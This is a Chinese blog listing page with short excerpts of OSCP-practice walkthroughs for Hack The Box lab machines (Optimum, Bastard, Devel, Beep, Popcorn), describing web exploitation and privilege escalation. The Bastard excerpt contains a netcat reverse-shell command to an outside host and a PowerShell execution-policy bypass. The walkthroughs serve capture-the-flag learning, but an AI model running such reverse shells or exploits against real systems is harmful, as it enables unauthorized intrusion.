- 博客(5)
- 资源 (15)
- 收藏
- 关注
原创 oscp——HTB——Optimum
0x00 前言难度入门1级0x01 信息收集0x02 Web——Webshell访问一下目标站点,看到是HFS搜一下payload发现可以直接使用msf打过去拿到shell之后就可以拿到user的flag这里我用cs又建立了一个稳定的连接0x03 Webshell——Rootshell首先systeminfo获取一下信息,然后使用Windows-Exploit-Suggester进行扫描使用MS16-098进行提权...
2020-05-25 17:26:38 540
原创 oscp——HTB——Bastard
0x00 前言难度入门1级0x01 信息收集0x02 Web——Webshell这里访问之后看到是一个Drupal的站,Drupal的站在7.0可以直接直接getshell使用脚本直接getshell0x03 Webshell——Rootshell传一个nc 上去然后反弹一个shellnc.exe -e cmd 10.10.14.6 1234这里可以使用Sherlock先进行扫描。powershell.exe -exec bypass -Command "& {Imp
2020-05-20 20:40:32 554
原创 oscp——HTB——Devel
0x00 前言难度入门1级0x01 信息收集这里可以看到开了21和80扫一下21,由于我这里有一点问题,所以21得重新扫一下0x02 21——Webshell本来以为是通过80扫目录然后搞进去。。。但是最后扫了半天发现扫错了。发现是通过21搞进去的。可以看到是匿名访问。所以直接使用ftp连接。这里可以看到ftp的目录可能是和web目录一致的访问test.txt进行测试这里使用msf生成一个aspx的马,然后直接put上传msf监听,访问cs.aspx会弹回来一个shell
2020-05-19 15:55:00 372
原创 oscp——HTB——Beep
0x00 前言难度入门1级0x01 信息收集0x02 Web——Rootshell先看一下80端口,是一个登录界面,尝试了弱口令以及SQL注入搜索一下Elastix的历史漏洞首先看到了一个LFI的洞,下载下来,然后看一下利用payload进行测试这里找到了一个admin的密码jEhdIekWmdjE可以尝试登录一下ssh,原本先尝试的admin,但是失败了,又尝试了下root,就可以成功的连接上了。...
2020-05-09 15:24:58 499
原创 oscp——HTB——Popcorn
0x00 前言难度入门2级0x01 信息收集这里开放了22和800x02 Web——Webshell看到这里是一个test,果断扫目录。拿到目录:http://10.10.10.6/testhttp://10.10.10.6/torrent/先看一下test,phpinfo的界面访问http://10.10.10.6/torrent/ 可以看到是一个torrent的站,先注册一个账号然后上传一个torrent然后这里上传成功这里上传文件,并使用burp拦截,并且修改
2020-05-09 14:32:12 540
SDL安全建设流程落地方法方案
2023-03-05
CVE-2016-3720
2023-02-22
CVE-2022-22963 复现Demo
2022-04-14
marshalsec.jar.7z
2021-12-03
vulhub-master.zip
2019-12-03
Dex文件头结构解析器
2018-03-05
Android逆向-java代码基础(1)
2018-01-06
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人